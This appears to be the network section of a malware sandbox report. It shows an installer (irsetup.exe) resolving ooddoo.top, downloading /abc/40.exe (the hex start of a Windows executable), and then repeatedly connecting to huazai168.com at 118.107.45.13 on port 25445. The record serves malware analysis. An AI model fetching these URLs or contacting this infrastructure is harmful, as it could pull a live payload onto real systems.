Dec 29, 2024 16:06:12.431811094 CET	50032	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:12.832931042 CET	50032	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:12.955372095 CET	25445	50032	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:15.065151930 CET	25445	50032	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:15.065253973 CET	50032	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:15.069255114 CET	50032	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:15.076070070 CET	50033	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:15.197115898 CET	25445	50033	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:15.197247982 CET	50033	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:15.652164936 CET	50033	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:15.773205996 CET	25445	50033	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:17.767185926 CET	25445	50033	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:17.767291069 CET	50033	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:17.767363071 CET	50033	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:17.779146910 CET	50034	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:17.900121927 CET	25445	50034	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:17.900250912 CET	50034	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:18.227976084 CET	50034	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:18.348897934 CET	25445	50034	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:20.481801033 CET	25445	50034	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:20.481918097 CET	50034	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:20.482009888 CET	50034	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:20.497915030 CET	50035	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:20.620006084 CET	25445	50035	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:20.620125055 CET	50035	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:21.022756100 CET	50035	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:21.143872976 CET	25445	50035	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:23.191039085 CET	25445	50035	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:23.191766977 CET	50035	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:23.191842079 CET	50035	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:23.201191902 CET	50036	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:23.323199034 CET	25445	50036	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:23.324336052 CET	50036	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:23.689547062 CET	50036	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:23.810986996 CET	25445	50036	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:25.937712908 CET	25445	50036	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:25.937788010 CET	50036	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:25.937887907 CET	50036	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:25.982074976 CET	50037	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:26.102888107 CET	25445	50037	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:26.105447054 CET	50037	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:26.461721897 CET	50037	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:26.583501101 CET	25445	50037	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:28.707057953 CET	25445	50037	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:28.707287073 CET	50037	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:28.707381964 CET	50037	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:28.718187094 CET	50038	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:28.839323044 CET	25445	50038	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:28.839472055 CET	50038	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:29.241334915 CET	50038	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:29.362998009 CET	25445	50038	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:31.457079887 CET	25445	50038	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:31.457144976 CET	50038	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:31.457266092 CET	50038	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:31.539546013 CET	50039	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:31.660618067 CET	25445	50039	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:31.660747051 CET	50039	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:32.370650053 CET	50039	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:32.492382050 CET	25445	50039	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:34.408103943 CET	25445	50039	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:34.408260107 CET	50039	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:34.421605110 CET	50039	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:34.659974098 CET	50040	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:34.780967951 CET	25445	50040	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:34.781064987 CET	50040	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:35.286262989 CET	50040	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:35.407571077 CET	25445	50040	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:37.500749111 CET	25445	50040	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:37.500844002 CET	50040	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:37.501029968 CET	50040	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:37.520946980 CET	50041	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:37.643812895 CET	25445	50041	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:37.643975973 CET	50041	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:38.037136078 CET	50041	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:38.157969952 CET	25445	50041	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:40.438004017 CET	25445	50041	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:40.438082933 CET	50041	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:40.438205004 CET	50041	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:40.452512980 CET	50042	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:40.573415995 CET	25445	50042	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:40.573493004 CET	50042	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:40.925031900 CET	50042	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:41.045934916 CET	25445	50042	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:43.211767912 CET	25445	50042	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:43.211833954 CET	50042	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:43.212035894 CET	50042	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:43.218305111 CET	50043	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:43.339337111 CET	25445	50043	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:43.339423895 CET	50043	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:43.681214094 CET	50043	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:43.802213907 CET	25445	50043	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:45.954919100 CET	25445	50043	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:45.955005884 CET	50043	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:45.955089092 CET	50043	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:45.956464052 CET	50044	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:46.077326059 CET	25445	50044	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:46.077426910 CET	50044	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:46.501281023 CET	50044	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:46.622384071 CET	25445	50044	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:48.696789980 CET	25445	50044	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:48.696911097 CET	50044	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:48.697020054 CET	50044	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:48.763927937 CET	50045	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:48.884953976 CET	25445	50045	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:48.885042906 CET	50045	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:49.347982883 CET	50045	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:49.468899012 CET	25445	50045	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:51.475742102 CET	25445	50045	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:51.475847960 CET	50045	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:51.476001978 CET	50045	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:51.490030050 CET	50046	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:51.610966921 CET	25445	50046	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:51.611092091 CET	50046	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:52.110528946 CET	50046	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:52.231443882 CET	25445	50046	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:54.150096893 CET	25445	50046	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:54.150177002 CET	50046	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:54.150342941 CET	50046	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:54.151294947 CET	50047	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:54.272186995 CET	25445	50047	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:54.272407055 CET	50047	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:54.603029013 CET	50047	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:54.723824024 CET	25445	50047	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:56.866683006 CET	25445	50047	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:56.866744041 CET	50047	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:56.866838932 CET	50047	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:56.877867937 CET	50048	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:56.999082088 CET	25445	50048	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:56.999169111 CET	50048	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:57.312561035 CET	50048	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:57.433887959 CET	25445	50048	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:59.570220947 CET	25445	50048	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:59.570297956 CET	50048	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:59.570414066 CET	50048	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:59.584984064 CET	50049	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:06:59.706129074 CET	25445	50049	118.107.45.13	192.168.2.5
Dec 29, 2024 16:06:59.706228971 CET	50049	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:00.081408024 CET	50049	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:00.202742100 CET	25445	50049	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:02.337387085 CET	25445	50049	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:02.337455988 CET	50049	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:02.337605000 CET	50049	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:02.340842009 CET	50050	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:02.461730003 CET	25445	50050	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:02.461812019 CET	50050	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:02.825153112 CET	50050	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:02.946269989 CET	25445	50050	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:05.045219898 CET	25445	50050	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:05.045322895 CET	50050	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:05.085071087 CET	50050	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:05.404623032 CET	50051	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:05.525701046 CET	25445	50051	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:05.525774956 CET	50051	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:05.875703096 CET	50051	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:05.997554064 CET	25445	50051	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:08.101890087 CET	25445	50051	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:08.101972103 CET	50051	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:08.102041006 CET	50051	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:08.115222931 CET	50052	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:08.237456083 CET	25445	50052	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:08.237627029 CET	50052	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:08.596616983 CET	50052	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:08.717751980 CET	25445	50052	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:10.828035116 CET	25445	50052	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:10.828156948 CET	50052	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:10.828277111 CET	50052	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:10.839128017 CET	50053	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:10.960561037 CET	25445	50053	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:10.960664988 CET	50053	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:11.296343088 CET	50053	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:11.417301893 CET	25445	50053	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:13.542433023 CET	25445	50053	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:13.542506933 CET	50053	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:13.542608976 CET	50053	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:13.544603109 CET	50054	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:13.665410042 CET	25445	50054	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:13.665601015 CET	50054	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:14.063412905 CET	50054	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:14.227530956 CET	25445	50054	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:16.217684031 CET	25445	50054	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:16.217772007 CET	50054	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:16.217839956 CET	50054	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:16.333342075 CET	50055	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:16.454272985 CET	25445	50055	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:16.454361916 CET	50055	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:16.962876081 CET	50055	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:17.084553957 CET	25445	50055	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:19.066247940 CET	25445	50055	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:19.066312075 CET	50055	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:19.151007891 CET	50055	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:19.315983057 CET	50056	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:19.436909914 CET	25445	50056	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:19.437016964 CET	50056	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:19.877794027 CET	50056	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:19.998769045 CET	25445	50056	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:22.022413015 CET	25445	50056	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:22.022500038 CET	50056	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:22.120620012 CET	50056	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:22.601116896 CET	50057	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:22.721926928 CET	25445	50057	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:22.721995115 CET	50057	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:23.056087971 CET	50057	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:23.177033901 CET	25445	50057	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:25.276680946 CET	25445	50057	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:25.276746035 CET	50057	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:25.276813030 CET	50057	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:25.286367893 CET	50058	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:25.408049107 CET	25445	50058	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:25.408153057 CET	50058	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:25.740814924 CET	50058	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:25.861759901 CET	25445	50058	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:27.993777037 CET	25445	50058	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:27.993853092 CET	50058	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:27.993941069 CET	50058	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:28.497982025 CET	50059	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:28.619227886 CET	25445	50059	118.107.45.13	192.168.2.5
Dec 29, 2024 16:07:28.619338989 CET	50059	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:28.735604048 CET	50059	25445	192.168.2.5	118.107.45.13
Dec 29, 2024 16:07:28.856429100 CET	25445	50059	118.107.45.13	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 16:03:35.980705976 CET	63072	53	192.168.2.5	1.1.1.1
Dec 29, 2024 16:03:36.315332890 CET	53	63072	1.1.1.1	192.168.2.5
Dec 29, 2024 16:03:54.780237913 CET	60427	53	192.168.2.5	1.1.1.1
Dec 29, 2024 16:03:55.203543901 CET	53	60427	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 29, 2024 16:03:35.980705976 CET	192.168.2.5	1.1.1.1	0x54e8	Standard query (0)	ooddoo.top	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:03:54.780237913 CET	192.168.2.5	1.1.1.1	0x2ff7	Standard query (0)	huazai168.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 29, 2024 16:03:36.315332890 CET	1.1.1.1	192.168.2.5	0x54e8	No error (0)	ooddoo.top	104.21.81.224	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:03:36.315332890 CET	1.1.1.1	192.168.2.5	0x54e8	No error (0)	ooddoo.top	172.67.165.100	A (IP address)	IN (0x0001)	false
Dec 29, 2024 16:03:55.203543901 CET	1.1.1.1	192.168.2.5	0x2ff7	No error (0)	huazai168.com	118.107.45.13	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ooddoo.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49736	104.21.81.224	80	5800	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 16:03:44.386563063 CET	188	OUT	GET /abc/40.exe HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Setup Factory 9.0 Host: ooddoo.top Connection: Keep-Alive Cache-Control: no-cache
Dec 29, 2024 16:03:45.496546030 CET	1017	IN	HTTP/1.1 301 Moved Permanently Date: Sun, 29 Dec 2024 15:03:45 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Sun, 29 Dec 2024 16:03:45 GMT Location: https://ooddoo.top/abc/40.exe Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xwwbnYA6Hry91ta%2F9ywd%2Fp36mym025m07%2F5dO80MzJNI2BuT7RJxo6G73m4AHzAwpPacMEOnLKl8hXdTWTWpDWa%2BLmdMbkJEK6h5jq5HvmHkTXAzPr6rlKKsdgw9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9aadbc3c12422d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=188&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	104.21.81.224	443	5800	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 15:03:37 UTC	188	OUT	GET /abc/40.exe HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Setup Factory 9.0 Host: ooddoo.top Connection: Keep-Alive Cache-Control: no-cache
2024-12-29 15:03:38 UTC	890	IN	HTTP/1.1 200 OK Date: Sun, 29 Dec 2024 15:03:38 GMT Content-Type: application/octet-stream Content-Length: 3149120 Connection: close Last-Modified: Sun, 29 Dec 2024 14:37:07 GMT ETag: "b672623ff59db1:0" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cyeqLKgJOCYtAnOKigwWjj9pJ1azdn5CvZOiAAewniGvCS3QMzxdY5E7741FgpK9UU8hpYR2aLWwOHPzHu6LhVWGWuWZCyqw6zlzzKIA0oscdUPYCuWTPDdoTt7b"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9aad8dbecfc360-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1476&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=802&delivery_rate=1941489&cwnd=138&unsent_bytes=0&cid=756e054a609476c9&ts=1337&x=0"
2024-12-29 15:03:38 UTC	479	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3f b7 1b 9a 7b d6 75 c9 7b d6 75 c9 7b d6 75 c9 a8 a4 76 c8 76 d6 75 c9 a8 a4 70 c8 d2 d6 75 c9 a8 a4 71 c8 6d d6 75 c9 df a8 71 c8 6a d6 75 c9 df a8 76 c8 6f d6 75 c9 a8 a4 73 c8 7a d6 75 c9 df a8 70 c8 28 d6 75 c9 a8 a4 74 c8 76 d6 75 c9 7b d6 74 c9 0e d6 75 c9 59 a9 7c c8 7a d6 75 c9 59 a9 8a c9 7a d6 75 c9 59 a9 77 c8 7a d6 75 c9 52 69 63 68 7b d6 75 c9 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?{u{u{uvvupuqmuqjuvouszup(utvu{tuY\|zuYzuYwzuRich{u
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 4c cb 01 00 00 10 00 00 00 04 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 a0 d1 00 00 00 e0 01 00 00 62 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 68 1c 00 00 00 c0 02 00 00 04 00 00 00 6a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 a9 97 05 00 00 e0 02 00 00 e0 01 00 00 6e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 2c 1b 00 00 00 80 08 00 00 18 00 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 69 64 61 74 61 00 00 00 10 00 00 00 a0 Data Ascii: L ` b@@ hj@ n@@ ,N@B.idata
2024-12-29 15:03:38 UTC	1369	IN	Data Raw: c0 36 a4 ee 59 0c 4f 92 ef 61 aa 96 05 bb 65 68 75 d3 d2 fa a4 c3 0c 1b 97 a5 21 ac 7f 2b 0e c0 cd 0b f2 72 89 0e 4a a8 a8 e4 54 a4 3b a7 ce 73 29 7d 1c 7c e6 0b 4d fb 4d 7f 62 b6 36 d5 48 36 87 fc c0 26 15 2c 3f 6e f4 5e 20 a3 69 7e 64 e9 41 e6 7d 44 71 62 a4 98 ad 9f 24 c6 1d 5a 9d 01 a7 92 93 b9 66 b2 b5 26 07 2d 1c 28 f6 26 f0 9e 1e 01 62 78 79 f5 5d 38 58 eb 2c 34 d7 9a ac 12 2d 66 aa 4a 9b ca 18 95 9a 7c 6d fa aa 3b 5d ce 8d 62 16 06 fd 9a de dc ed a1 69 b9 21 fb ec 8d b7 d8 c0 34 82 e4 a5 3c 8d ac 1c b4 4c a1 a9 1b b0 1a a4 1f b8 65 1b e7 2a 1d 63 ff 71 cc 86 14 81 31 5e 9f ce d8 70 ab ab 06 3a a5 6a 04 ad 77 5f 8e c3 f4 30 3e 7d f5 12 ce 35 8f 9e 6c a0 6f 44 a0 10 e1 8f 56 8a 97 3b b4 1e 3c 85 80 1d 7a 6e d8 4f c3 b5 de a4 8f e2 7e 7c bc f5 7c 58 Data Ascii: 6YOaehu!+rJT;s)}\|MMb6H6&,?n^ i~dA}Dqb$Zf&-(&bxy]8X,4-fJ\|m;]bi!4<Le*cq1^p:jw_0>}5loDV;<znO~\|\|X
